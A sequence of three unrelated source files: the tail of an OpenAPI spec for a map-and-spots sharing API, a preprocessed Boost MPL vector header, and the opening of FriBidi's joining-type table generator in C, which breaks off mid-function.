$ref: "#/definitions/SpotEditable"
responses:
"200":
description: Contains spot data
schema:
$ref: "#/definitions/Spot"
summary: Create spot
tags:
- Spots
"/maps/{id}/subscriptions":
delete:
description: Unsubscribe from map.
parameters:
- description: map id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted subscription.
schema:
$ref: "#/definitions/Subscription"
summary: Unsubscribe from map
tags:
- Subscriptions
get:
description: List subscriptions for a given map.
parameters:
- description: Id of map
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains list of subscriptions.
schema:
items:
$ref: "#/definitions/Subscription"
type: array
summary: List subscriptions for a given map
tags:
- Subscriptions
"/maps/{map_id}/spots/{id}":
get:
description: Get basic information about a spot
parameters:
- description: Id of spot
in: path
name: id
required: true
type: integer
- description: Id of map
in: path
name: map_id
required: true
type: integer
responses:
"200":
description: Contains spot data
schema:
$ref: "#/definitions/Spot"
summary: Get spot
tags:
- Spots
"/maps/{map_id}/spots/{spot_id}/respot":
delete:
description: Delete respot from map by spot id.
parameters:
- description: Map Id
in: path
name: map_id
required: true
type: integer
- description: Spot Id
in: path
name: spot_id
required: true
type: integer
responses:
"200":
description: Contains deleted respot.
schema:
$ref: "#/definitions/Respot"
summary: Delete respot from map by spot id
tags:
- Respots
/respot_maps:
get:
description: List maps that user can respot to.
responses:
"200":
description: Contains list of maps.
schema:
items:
$ref: "#/definitions/Map"
type: array
summary: List maps that user can respot to
tags:
- Respots
"/respots/{id}":
delete:
description: Delete respot.
parameters:
- description: Respot Id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted respot.
schema:
$ref: "#/definitions/Respot"
summary: Delete respot
tags:
- Respots
get:
description: Get basic information about a respot
parameters:
- description: Id of respot
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains respot data.
schema:
$ref: "#/definitions/Respot"
summary: Get respot
tags:
- Respots
"/share/map/{id}":
get:
description: Get secret access token of an uebermap with access set to 'Secret link'. Pass the 'token' on every request you make to access this uebermap and its resources. F.e. token=1-x_gqu7eLBe3uKoAGAGXy
parameters:
- description: Id of map
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains map data and a secret token to access this map.
schema:
$ref: "#/definitions/MapWithAuthToken"
summary: Get secret access token to share map
tags:
- Share
/spots:
get:
description: List your own spots.
parameters:
- description: Order of spots
enum:
- created_at_asc
- created_at_desc
- updated_at_asc
- updated_at_desc
- title_asc
- title_desc
in: query
name: order
type: string
responses:
"200":
description: Contains list of spots.
schema:
items:
$ref: "#/definitions/Spot"
type: array
summary: List your own spots
tags:
- Spots
/spots/search:
get:
description: Search spots
parameters:
- description: Query
in: query
name: q
type: string
- description: "Distance. Diameter of search radius in meter (default: 2000 meter)"
in: query
name: d
type: integer
- description: Latitude for search radius (2 km)
in: query
name: lat
type: number
- description: Longitude for search radius (2 km)
in: query
name: lon
type: number
responses:
"200":
description: Contains spot data.
schema:
$ref: "#/definitions/Spot"
summary: Search spots
tags:
- Search
"/spots/{id}":
delete:
description: Delete spot.
parameters:
- description: spot id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted spot.
schema:
$ref: "#/definitions/Spot"
summary: Delete spot
tags:
- Spots
patch:
description: Update spot. Wrap parameters in [spot]. To update the spot picture pass a base64 encoded string to [spot][picture].
parameters:
- description: spot id
in: path
name: id
required: true
type: integer
- description: spot attributes
in: body
name: spot
required: false
schema:
$ref: "#/definitions/SpotEditable"
responses:
"200":
description: Contains spot data
schema:
$ref: "#/definitions/Spot"
summary: Update spot
tags:
- Spots
"/spots/{id}/attachments":
get:
description: List attachments for a given spot.
parameters:
- description: Spot id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains list of attachments.
schema:
items:
$ref: "#/definitions/Attachment"
type: array
summary: List attachments for a given spot
tags:
- Attachments
post:
description: Upload spot attachment. Wrap attachment parameters in [attachment]
parameters:
- description: Spot id
in: path
name: id
required: true
type: integer
- description: Base64 encoded image
in: body
name: image
required: true
schema:
type: string
responses:
"200":
description: Contains attachment data
schema:
$ref: "#/definitions/Attachment"
summary: Upload spot attachment
tags:
- Attachments
"/spots/{id}/comments":
get:
description: List comments for a given spot.
parameters:
- description: Id of spot
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains list of comments.
schema:
items:
$ref: "#/definitions/Comment"
type: array
summary: List comments for a given spot
tags:
- Comments
post:
description: Create spot comment. Wrap comment parameters in [comment].
parameters:
- description: spot id
in: path
name: id
required: true
type: integer
- description: comment attributes
in: body
name: comment
required: false
schema:
$ref: "#/definitions/CommentEditable"
responses:
"200":
description: Contains comment data
schema:
$ref: "#/definitions/Comment"
summary: Create spot comment
tags:
- Comments
"/spots/{id}/events":
get:
description: List maps for a given spot.
parameters:
- description: Id of spot
in: path
name: id
required: true
type: integer
- description: Begin of time range of event (ISO 8601 date format).
in: query
name: timeframe_start
required: false
type: string
- description: End of time range of event (ISO 8601 date format).
in: query
name: timeframe_end
required: false
type: string
- description: "To refine your event index request to contain only events within a geographical box pass the followng bounds parameters. F. e. to get events within 'Hamburg, St. Pauli': bounds[sw_lat]=53.54831449741324 bounds[sw_lon]=9.943227767944336 bounds[ne_lat]=53.5571103674878 bounds[ne_lon]=9.9776029586792"
in: query
name: bounds
required: false
type: string
responses:
"200":
description: Contains list of events.
schema:
items:
$ref: "#/definitions/Event"
type: array
summary: List events for a given spot
tags:
- Events
post:
description: Create event. Wrap map parameters in [event].
parameters:
- description: Spot id
in: path
name: id
required: true
type: integer
- description: Event attributes
in: body
name: event
required: false
schema:
$ref: "#/definitions/EventEditable"
responses:
"200":
description: Contains event data
schema:
$ref: "#/definitions/Event"
summary: Create event
tags:
- Events
"/spots/{id}/respots":
post:
description: Respot a spot onto a map.
parameters:
- description: Spot Id
in: path
name: id
required: true
type: integer
- description: Map Id
in: body
name: map_id
required: true
schema:
format: integer
type: number
responses:
"200":
description: Contains respot data.
schema:
$ref: "#/definitions/Respot"
summary: Respot a spot onto a map
tags:
- Respots
/subscriptions:
get:
description: List subscriptions.
parameters:
- description: Id of user
in: query
name: user_id
type: integer
- description: Id of map
in: query
name: map_id
type: integer
responses:
"200":
description: Contains list of subscriptions.
schema:
items:
$ref: "#/definitions/Subscription"
type: array
summary: List subscriptions. Pass no parameters to get own subscriptions
tags:
- Subscriptions
post:
description: Create map subscription.
parameters:
- description: map id
in: body
name: map_id
required: true
schema:
format: integer
type: number
responses:
"200":
description: Contains subscription data.
schema:
$ref: "#/definitions/Subscription"
summary: Create map subscription
tags:
- Subscriptions
/trends/latest:
get:
description: List latest maps.
responses:
"200":
description: Contains list of maps.
schema:
items:
$ref: "#/definitions/Map"
type: array
summary: List latest maps
tags:
- Trends
/trends/recommended:
get:
description: List recommended maps.
responses:
"200":
description: Contains list of maps.
schema:
items:
$ref: "#/definitions/Map"
type: array
summary: List recommended maps
tags:
- Trends
/users/search:
get:
description: Search users
parameters:
- description: Query
in: query
name: q
type: string
responses:
"200":
description: Contains users data.
schema:
$ref: "#/definitions/User"
summary: Search users
tags:
- Search
"/users/{id}":
get:
description: Get profile a user
parameters:
- description: Id of user
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains user data
schema:
$ref: "#/definitions/User"
summary: Get user profile
tags:
- Users
"/users/{user_id}/maps":
get:
description: List maps for a given user.
parameters:
- description: Id of user
in: path
name: user_id
required: true
type: integer
responses:
"200":
description: Contains list of maps.
schema:
items:
$ref: "#/definitions/Map"
type: array
summary: List maps for a given user
tags:
- Maps
definitions:
Attachment:
properties:
attachable_id:
example: 7543829
type: integer
attachable_type:
example: Spot
type: string
created_at:
format: date-time
type: string
description:
example: This photo was taken in front of the restaurant
type: string
file_url:
example: https://...
type: string
id:
example: 34939432
type: integer
map_id:
example: 985732
type: integer
sizes:
example:
large:
h: 860
w: 1024
type: object
spot:
$ref: "#/definitions/Spot"
status:
enum:
- approved
- unapproved
example: approved
type: string
user:
$ref: "#/definitions/User"
Collaborator:
properties:
created_at:
format: date-time
type: string
group:
enum:
- admin
- editor
example: editor
type: string
id:
example: 4829504
type: integer
is_admin:
example: false
type: boolean
map:
$ref: "#/definitions/Map"
map_id:
example: 324894
type: integer
updated_at:
format: date-time
type: string
user:
$ref: "#/definitions/User"
user_id:
example: 649302
type: integer
CollaboratorEditable:
properties:
group:
enum:
- admin
- editor
example: editor
type: string
CollaboratorInvitation:
properties:
accepted:
example: true
type: boolean
created_at:
format: date-time
type: string
email:
example: [email protected]
type: string
group:
enum:
- admin
- editor
example: editor
type: string
id:
example: 8696493
type: integer
invited_by_user:
$ref: "#/definitions/User"
map:
$ref: "#/definitions/Map"
sent:
example: true
type: boolean
updated_at:
format: date-time
type: string
user:
$ref: "#/definitions/User"
CollaboratorInvitationCreate:
properties:
emails:
example: [email protected], [email protected], [email protected]
type: string
is_admin:
example: true
type: boolean
map_id:
example: 34925783
type: integer
user_ids:
example: 5839459, 389423, 89494, 686950
type: string
Comment:
properties:
body:
example: Nice photo
type: string
created_at:
format: date-time
type: string
id:
example: 29628358
type: integer
status:
enum:
- approved
- unapproved
example: approved
type: string
updated_at:
format: date-time
type: string
user:
$ref: "#/definitions/User"
CommentEditable:
properties:
body:
example: Nice photo
type: string
Event:
properties:
counts:
$ref: "#/definitions/EventCounts"
created_at:
format: date-time
type: string
description:
example: Very special event
type: string
ends_at:
format: date-time
type: string
id:
example: 482959
type: integer
lat:
example: 53.293493
type: number
lon:
example: 12.394328
type: number
owner_id:
example: 82389429
type: integer
picture_url:
example: https://...
type: string
spot:
$ref: "#/definitions/Spot"
starts_at:
format: date-time
type: string
time_zone:
example: Berlin
type: string
title:
example: 20th anniversary event
type: string
updated_at:
format: date-time
type: string
user:
$ref: "#/definitions/User"
EventCounts:
properties:
attachments:
example: 27
type: integer
comments:
example: 284
type: integer
EventEditable:
properties:
description:
example: Very special event
type: string
ends_at:
format: date-time
type: string
lat:
example: 53.293493
type: number
lon:
example: 12.394328
type: number
picture:
example: <BASE_64_ENCODED_STRING>
type: string
starts_at:
format: date-time
type: string
time_zone:
example: Berlin
type: string
title:
example: 20th anniversary event
type: string
user_id:
example: 703943
type: integer
Map:
properties:
counts:
$ref: "#/definitions/MapCounts"
created_at:
format: date-time
type: string
description:
example: A collection of restaurants, cafes, clubs and random spots that I recommend in Berlin
type: string
id:
example: 18234843
type: integer
map_settings:
$ref: "#/definitions/MapSettings"
owner_id:
example: 9829358
type: integer
picture_url:
example: https://...
type: string
title:
example: My favourite places in Berlin
type: string
updated_at:
format: date-time
type: string
visibility:
enum:
- public
- link
- private
example: public
type: string
MapCounts:
properties:
attachments:
example: 31
type: integer
comments:
example: 234
type: integer
impressions:
example: 234332
type: integer
respots:
example: 24
type: integer
spots:
example: 67
type: integer
subscriptions:
example: 3892
type: integer
MapEditable:
properties:
description:
example: A collection of restaurants, cafes, clubs and random spots that I recommend in Berlin
type: string
map_settings:
$ref: "#/definitions/MapSettings"
picture:
example: <BASE_64_ENCODED_STRING>
type: string
title:
example: My favourite places in Berlin
type: string
visibility:
enum:
- public
- link
- private
example: public
type: string
MapRelation:
properties:
access:
example:
- can_administer.map
- can_administer.spots
- can_administer.events
- can_administer.comments
- can_administer.attachments
- can_administer.collaborators
type: string
access_group:
enum:
- visitor
- editor
- admin
example: owner
type: string
subscribed:
example: true
type: boolean
MapSettings:
properties:
editor_access:
example:
- can_administer.map
- can_administer.spots
- can_administer.events
- can_administer.comments
- can_administer.attachments
- can_administer.collaborators
type: string
respotting_to_this_map:
example: true
type: boolean
visitor_access:
example:
- can_administer.map
- can_administer.spots
- can_administer.events
- can_administer.comments
- can_administer.attachments
- can_administer.collaborators
type: string
MapWithAuthToken:
properties:
counts:
$ref: "#/definitions/MapCounts"
created_at:
format: date-time
type: string
description:
example: A collection of restaurants, cafes, clubs and random spots that I recommend in Berlin
type: string
id:
example: 18234843
type: integer
owner_id:
example: 9829358
type: integer
picture_url:
example: https://...
type: string
title:
example: My favourite places in Berlin
type: string
token:
example: 1-x_gqu7eLBe3uKoAGAGXy
type: string
updated_at:
format: date-time
type: string
visibility:
enum:
- public
- link
- private
example: public
type: string
MapWithRelation:
properties:
counts:
$ref: "#/definitions/MapCounts"
created_at:
format: date-time
type: string
description:
example: A collection of restaurants, cafes, clubs and random spots that I recommend in Berlin
type: string
id:
example: 18234843
type: integer
map_settings:
$ref: "#/definitions/MapSettings"
owner_id:
example: 9829358
type: integer
picture_url:
example: https://...
type: string
relation:
$ref: "#/definitions/MapRelation"
title:
example: My favourite places in Berlin
type: string
updated_at:
format: date-time
type: string
visibility:
enum:
- public
- link
- private
example: public
type: string
Respot:
properties:
created_at:
format: date-time
type: string
id:
example: 589032
type: integer
map:
$ref: "#/definitions/Map"
map_id:
example: 8393450
type: integer
spot:
$ref: "#/definitions/Spot"
updated_at:
format: date-time
type: string
user:
$ref: "#/definitions/User"
Spot:
properties:
counts:
$ref: "#/definitions/SpotCounts"
created_at:
format: date-time
type: string
description:
example: Landed here by accident but look how wonderful this place is in the photos attached
type: string
id:
example: 5932234
type: integer
lat:
example: 53.112385
type: number
lon:
example: 10.58349
type: number
map_id:
example: 394805
type: integer
picture_url:
example: https://...
type: string
status:
enum:
- approved
- unapproved
example: approved
type: string
time_zone:
example: Berlin
type: string
title:
example: Beautiful place out in the country
type: string
updated_at:
format: date-time
type: string
user:
$ref: "#/definitions/User"
SpotCounts:
properties:
attachments:
example: 4
type: integer
comments:
example: 24
type: integer
respot:
example: 34
type: integer
SpotEditable:
properties:
description:
example: Landed here by accident but look how wonderful this place is in the photos attached
type: string
lat:
example: 53.112385
type: number
lon:
example: 10.58349
type: number
picture:
example: <BASE_64_ENCODED_STRING>
type: string
time_zone:
example: Berlin
type: string
title:
example: Beautiful place out in the country
type: string
Subscription:
properties:
created_at:
format: date-time
type: string
id:
example: 23950552
type: integer
map:
$ref: "#/definitions/Map"
updated_at:
format: date-time
type: string
user:
$ref: "#/definitions/User"
user_id:
example: 852002
type: integer
User:
properties:
about:
example: The comedian
type: string
counts:
properties:
maps:
example: 24
type: integer
header_picture:
example: https://...
type: string
id:
example: 5829035
type: integer
location:
example: Little Rock, Arkansas
type: string
name:
example: Bill Hicks
type: string
picture_url:
example: https://...
type: string
screen_name:
example: billhicks
type: string
url:
example: http://www.billhicks.com
type: string
UserAuthentication:
properties:
email:
example: [email protected]
type: string
password:
example: ••••••••
type: string
UserEditable:
properties:
about:
example: The comedian
type: string
header:
example: <BASE_64_ENCODED_STRING>
type: string
language:
example: en
type: string
location:
example: Little Rock, Arkansas
type: string
name:
example: Bill Hicks
type: string
picture:
example: <BASE_64_ENCODED_STRING>
type: string
screen_name:
example: billhicks
type: string
time_zone:
example: Pacific Time (US & Canada)
type: string
url:
example: http://www.billhicks.com
type: string
UserFullProfile:
allOf:
- $ref: "#/definitions/User"
properties:
auth_token:
example: 6g8as82h3kj23h2
type: string
language:
example: en
type: string
time_zone:
example: Pacific Time (US & Canada)
type: string
| {
"pile_set_name": "Github"
} |
// Copyright Aleksey Gurtovoy 2000-2004
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
//
// Preprocessed version of "boost/mpl/vector.hpp" header
// -- DO NOT modify by hand!
namespace boost { namespace mpl {
namespace aux {
template< int N >
struct vector_chooser;
}
namespace aux {
template<>
struct vector_chooser<0>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef vector0<
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<1>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector1<
T0
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<2>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector2<
T0, T1
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<3>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector3<
T0, T1, T2
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<4>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector4<
T0, T1, T2, T3
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<5>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector5<
T0, T1, T2, T3, T4
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<6>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector6<
T0, T1, T2, T3, T4, T5
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<7>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector7<
T0, T1, T2, T3, T4, T5, T6
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<8>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector8<
T0, T1, T2, T3, T4, T5, T6, T7
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<9>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector9<
T0, T1, T2, T3, T4, T5, T6, T7, T8
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<10>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector10<
T0, T1, T2, T3, T4, T5, T6, T7, T8, T9
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<11>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector11<
T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<12>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector12<
T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<13>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector13<
T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<14>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector14<
T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<15>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector15<
T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<16>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector16<
T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<17>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector17<
T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<18>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector18<
T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<19>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector19<
T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17, T18
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<20>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector20<
T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17, T18, T19
>::type type;
};
};
} // namespace aux
namespace aux {
template< typename T >
struct is_vector_arg
{
BOOST_STATIC_CONSTANT(bool, value = true);
};
template<>
struct is_vector_arg<na>
{
BOOST_STATIC_CONSTANT(bool, value = false);
};
template<
typename T1, typename T2, typename T3, typename T4, typename T5
, typename T6, typename T7, typename T8, typename T9, typename T10
, typename T11, typename T12, typename T13, typename T14, typename T15
, typename T16, typename T17, typename T18, typename T19, typename T20
>
struct vector_count_args
{
BOOST_STATIC_CONSTANT(int, value =
is_vector_arg<T1>::value + is_vector_arg<T2>::value
+ is_vector_arg<T3>::value + is_vector_arg<T4>::value
+ is_vector_arg<T5>::value + is_vector_arg<T6>::value
+ is_vector_arg<T7>::value + is_vector_arg<T8>::value
+ is_vector_arg<T9>::value + is_vector_arg<T10>::value
+ is_vector_arg<T11>::value + is_vector_arg<T12>::value
+ is_vector_arg<T13>::value + is_vector_arg<T14>::value
+ is_vector_arg<T15>::value + is_vector_arg<T16>::value
+ is_vector_arg<T17>::value + is_vector_arg<T18>::value
+ is_vector_arg<T19>::value + is_vector_arg<T20>::value
);
};
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct vector_impl
{
typedef aux::vector_count_args<
T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17, T18, T19
> arg_num_;
typedef typename aux::vector_chooser< arg_num_::value >
::template result_< T0,T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19 >::type type;
};
} // namespace aux
template<
typename T0 = na, typename T1 = na, typename T2 = na, typename T3 = na
, typename T4 = na, typename T5 = na, typename T6 = na, typename T7 = na
, typename T8 = na, typename T9 = na, typename T10 = na, typename T11 = na
, typename T12 = na, typename T13 = na, typename T14 = na
, typename T15 = na, typename T16 = na, typename T17 = na
, typename T18 = na, typename T19 = na
>
struct vector
: aux::vector_impl<
T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17, T18, T19
>::type
{
typedef typename aux::vector_impl<
T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17, T18, T19
>::type type;
};
}}
| {
"pile_set_name": "Github"
} |
/* FriBidi
* gen-joining-type-tab.c - generate joining-type.tab.i
*
* Author:
* Behdad Esfahbod, 2004
*
* Copyright (C) 2004 Sharif FarsiWeb, Inc
* Copyright (C) 2004 Behdad Esfahbod
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with this library, in a file named COPYING; if not, write to the
* Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
* Boston, MA 02110-1301, USA
*
* For licensing issues, contact <[email protected]>.
*/
#include <common.h>
#include <fribidi-unicode.h>
#include <stdio.h>
#ifdef HAVE_CONFIG_H
# include <config.h>
#endif
#ifdef STDC_HEADERS
# include <stdlib.h>
# include <stddef.h>
#else
# if HAVE_STDLIB_H
# include <stdlib.h>
# endif
#endif
#ifdef HAVE_STRING_H
# if !STDC_HEADERS && HAVE_MEMORY_H
# include <memory.h>
# endif
# include <string.h>
#endif
#ifdef HAVE_STRINGS_H
# include <strings.h>
#endif
#include "packtab.h"
#define appname "gen-joining-type-tab"
#define outputname "joining-type.tab.i"
static void
die (
const char *msg
)
{
fprintf (stderr, appname ": %s\n", msg);
exit (1);
}
static void
die2 (
const char *fmt,
const char *p
)
{
fprintf (stderr, appname ": ");
fprintf (stderr, fmt, p);
fprintf (stderr, "\n");
exit (1);
}
static void
die3 (
const char *fmt,
const char *p,
const char *q
)
{
fprintf (stderr, appname ": ");
fprintf (stderr, fmt, p, q);
fprintf (stderr, "\n");
exit (1);
}
static void
die3l (
const char *fmt,
unsigned long l,
const char *p
)
{
fprintf (stderr, appname ": ");
fprintf (stderr, fmt, l, p);
fprintf (stderr, "\n");
exit (1);
}
enum FriBidiJoiningLinearEnumOffsetOne
{
# define _FRIBIDI_ADD_TYPE(TYPE,SYMBOL) TYPE,
# include <fribidi-joining-types-list.h>
# undef _FRIBIDI_ADD_TYPE
NUM_TYPES
};
struct
{
const char *name;
int key;
}
type_names[] =
{
# define _FRIBIDI_ADD_TYPE(TYPE,SYMBOL) {STRINGIZE(TYPE), TYPE},
# include <fribidi-joining-types-list.h>
# undef _FRIBIDI_ADD_TYPE
};
#define type_names_count (sizeof (type_names) / sizeof (type_names[0]))
static const char *names[type_names_count];
static char
get_type (
const char *s
)
{
unsigned int i;
for (i = 0; i < type_names_count; i++)
if (!strcmp (s, type_names[i].name))
return type_names[i].key;
die2 ("joining type name `%s' not found", s);
return -1;
}
static const char *ignored_bidi_types[] = {
"BN",
"LRE",
"RLE",
"LRO",
"RLO",
"PDF",
"LRI",
"RLI",
"FSI",
"PDI",
NULL
};
static const char *transparent_general_categories[] = {
"Mn",
"Mn",
"Cf",
NULL
};
static const char *
type_is (
const char *s,
const char *type_list[]
)
{
for (; type_list[0]; type_list++)
if (!strcmp (s, type_list[0]))
return type_list[0];
return NULL;
}
#define table_name "Joi"
#define macro_name "FRIBIDI_GET_JOINING_TYPE"
static signed int table[FRIBIDI_UNICODE_CHARS];
static char buf[4000];
static char tp[sizeof (buf)], tp_gen[sizeof (buf)], tp_bidi[sizeof (buf)];
static void
clear_tab (
void
)
{
register FriBidiChar c;
for (c = 0; c < FRIBIDI_UNICODE_CHARS; c++)
table[c] = U;
}
static void
init (
void
)
{
register int i;
for (i = 0; i < type_names_count; i++)
names[i] = 0;
for (i = type_names_count - 1; i >= 0; i--)
names[type_names[i].key] = type_names[i].name;
clear_tab ();
}
static void
read_unicode_data_txt (
FILE *f
)
{
unsigned long c, l;
l = 0;
